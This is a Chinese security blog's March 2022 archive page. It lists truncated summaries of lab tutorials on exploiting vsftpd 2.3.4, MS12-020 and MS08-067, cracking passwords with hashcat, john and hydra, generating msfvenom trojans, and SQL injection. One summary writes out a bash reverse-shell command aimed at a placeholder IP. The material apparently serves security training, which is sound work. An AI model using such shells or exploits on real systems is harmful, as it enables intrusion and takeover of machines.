03 2022 档案
摘要:漏洞概要 在vsftpd 2.3.4版本中,在登录输入用户名时输入:)类似于笑脸的符号,会导致服务处理开启6200后门端口,直接执行系统命令 漏洞利用 攻击机:kali 2022 msfconsole利用或者nc连接后门端口利用 靶机: Metasploitable2-Linux,这是一个集成了很多
阅读全文
摘要:A-1任务一 登录安全加固 1.密码策略(Windows,Linux) 主要是针对windows和Linux的系统加固,类似于运维的题目 a.设置最短密码长度为15; 这里并没有说明具体是Windows还是Linux,默认就是全部设置 Windows Win + R -> secpol.msc ->
阅读全文
摘要:漏洞概要 MS12-020是一个3389远程桌面rdp协议的一个漏洞 攻击者通过特意构造的rdp数据包发送给靶机3389端口,造成系统崩溃,蓝屏重启 影响范围:windows xp 、2003、2008,该漏洞针对于3389的远程桌面服务,并不是操作系统 实验场景 攻击机:kali2022 msfc
阅读全文
摘要:漏洞概要 MS-08-067是Windows平台中smb服务445端口的远程代码执行漏洞 利用成功可以远程控制主机 影响范围为:windows2000、xp、server 2003、server 2008、甚至早些版本的Win7 实验场景 攻击机:kali2022msfconsole利用 靶机:wi
阅读全文
摘要:下载 下载地址见湖南科技大学老师:http://mooc1.xueyinonline.com/nodedetailcontroller/visitnodedetail?courseId=222640205&knowledgeId=514468936 其中有7.1.1和7.3.0版本的Cisco,另外
阅读全文
摘要:暴力破解压缩包密码工具kali中fcarck和windows ARCHPR的使用 fcrack fcrack 是kali中自带的压缩包密码破解工具,如果没有可以apt install fcrack安装 参数 作用 -b 暴力破解方式 -D 字典 字典破解方式 -c 暴力破解的字符类型,1=1~9,a
阅读全文
摘要:官网简介:Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身 官网:https://vulhub.org/ github:https://github.com
阅读全文
摘要:john类似于hashcat一样,也是一款密码破解方式,john跟专注于系统密码的破解,并且和hashcat一样在kali中自带 hash请见hash的简单使用 识别Hash类型 john会自动识别需要破解的hash,但是很多时候会识别错误,这不用担心,我们使用专门识别hash类型的工具hash-i
阅读全文
摘要:在我们抓取到系统的hash值之后,需要通过一些工具来破解密码 hashcat是一款可以基于显卡暴力破解密码的工具,几乎支持了所有常见的加密,并且支持各种姿势的密码搭配 在kali Linux中自带的有,也支持Windows Mac平台,可以在官网下载:https://hashcat.net 得到一个
阅读全文
摘要:在对Web网站进行审计时,首先我们会对进场出现的/admin和robots.txt等信息和目录进行初步的审计获取重要的信息,但是手动猜测目录过于缓慢,使用工具能够迅速的爆破出目录 目录爆破取决于字典的强大,和高性能的机器。 御剑 下载地址:https://github.com/foryujian/y
阅读全文
摘要:volatility 简介: volatility(挖楼推了推) 是一个开源的框架,能够对导出的内存镜像进行分析,能够通过获取内核的数据结构,使用插件获取内存的详细情况和运行状态,同时可以直接dump系统文件,屏幕截图,查看进程。 官网下载地址:https://www.volatilityfound
阅读全文
摘要:通过之前的博客WinHex恢复分区,我们知道 在MBR中,一共有四行是我们分区的引导,所以,我们手动只能创建三个主分区,通过工具软件,我们最多可以创建四个主分区 那么测试:如何创建四个主分区? 首先,我们创建三个主分区 在创建第四个分区的时候,观察会发现自动变成了一个扩展分区就是绿框框,绿框框里面才
阅读全文
摘要:情景再现:可能在某一天,打开电脑时发现只剩C盘,剩下的盘找不到了,那么要如何恢复呢? 创建虚拟硬盘方便我们做实验 右键计算机 → 管理 → 磁盘管理右键 → 创建VHD虚拟硬盘 创建VHD虚拟硬盘会弹出下面的窗口 首先点击预览选择创建虚拟硬盘位置,然后创建虚拟硬盘的大小,这里我是15G,选择虚拟硬盘
阅读全文
摘要:msfvenom也只metasploit中的一个很强的工具,msfvenom生成木马非常的迅速可以各种版本的木马 该工具由msfpaylod和msfencodes的组成 生成木马是需要在本地监听,等待木马上线即可。该步骤在meterpretr的使用有使用到 命令 这里我们主要讲解msfvenom的命
阅读全文
摘要:meterpreter是metasploit中的一个杀手锏,通常在漏洞利用成功后,会返回给攻击者一个攻击通道,其中有很多自动化操作 场景布置 生成木马 首先,我们使用metasploit中的另一个后门工具msfvenom生成一个木马,方便我们测试meterpreter msfvenom -p win
阅读全文
摘要:msfconsole是metasploit中的一个工具; msfconsole集成了很多漏洞的利用的脚本,并且使用起来很简单的网络安全工具 在终端输入msfconsole命令即可进入msf的控制台,msf控制台集成了很多其他程序接口,例如nmap,sqlmap可以在msf控制台中使用 可以看到每个分
阅读全文
摘要:Hydra 在爆破工具中,hydra可是数一数二的存在,是著名黑客组织thc开发的一款开源的暴力密码破解工具,可以在线破解多种密码 Hydra 能够暴力破解以下协议:Asterisk、AFP、Cisco AAA、Cisco auth、Cisco enable、CVS、Firebird、FTP、HTT
阅读全文
摘要:反弹shell一般利用在命令执行漏洞中 在Netcat的学习中我们学习了如何使用nc -e /bin/bash反弹shell 这里分享一些除了nc以外其他的反弹方式 Bash反弹shell bash -i >& /dev/tcp/IP地址/端口 0>&1 /dev/tcp,udp,host,port
阅读全文
摘要:NetCat瑞士军刀,网络中的瑞士军刀,短小而精悍,功能齐全。简称为nc 端口扫描 参数 作用 -v 扫描端口是否开放 -z 指定端口范围 -w 指定扫描时间 -u 指定udp端口 例如:查看172.16.1.80的21端口是否开启 nc -v 172.16.1.80 21 扫描172.16.1.8
阅读全文
摘要:主机发现工具 当我们加入一个网段时,不知道该网段主机存活的数量,首先我们要先进行主机存活发现 ping ping命令通常用户查看网络连接状态;得到服务器的IP地址,还有网络连接的延迟,另外可以通过TTL判断出目标的操作系统,在网上的服务器中,一般该值都被修改 在linux中,ping命令会一直进行p
阅读全文
摘要:upload-labs是一个练习文件上传的靶场 我们需要先安装中间件和PHP,推荐使用小皮面板,如何安装使用见sqli-labs搭建前部分 upload-labs下载:https://gitcode.net/mirrors/c0ny1/upload-labs/-/archive/master/upl
阅读全文
摘要:补坑:报错注入 当我们 union 无法注入的时候,可以使用报错注入,这里我们有三种报错注入,xpth语法错误和count()+rand()+floor()+group by重复组建错误 extractvalue()函数 extractvalue()函数是对XML语法进行读取查看的函数,就例如我们熟
阅读全文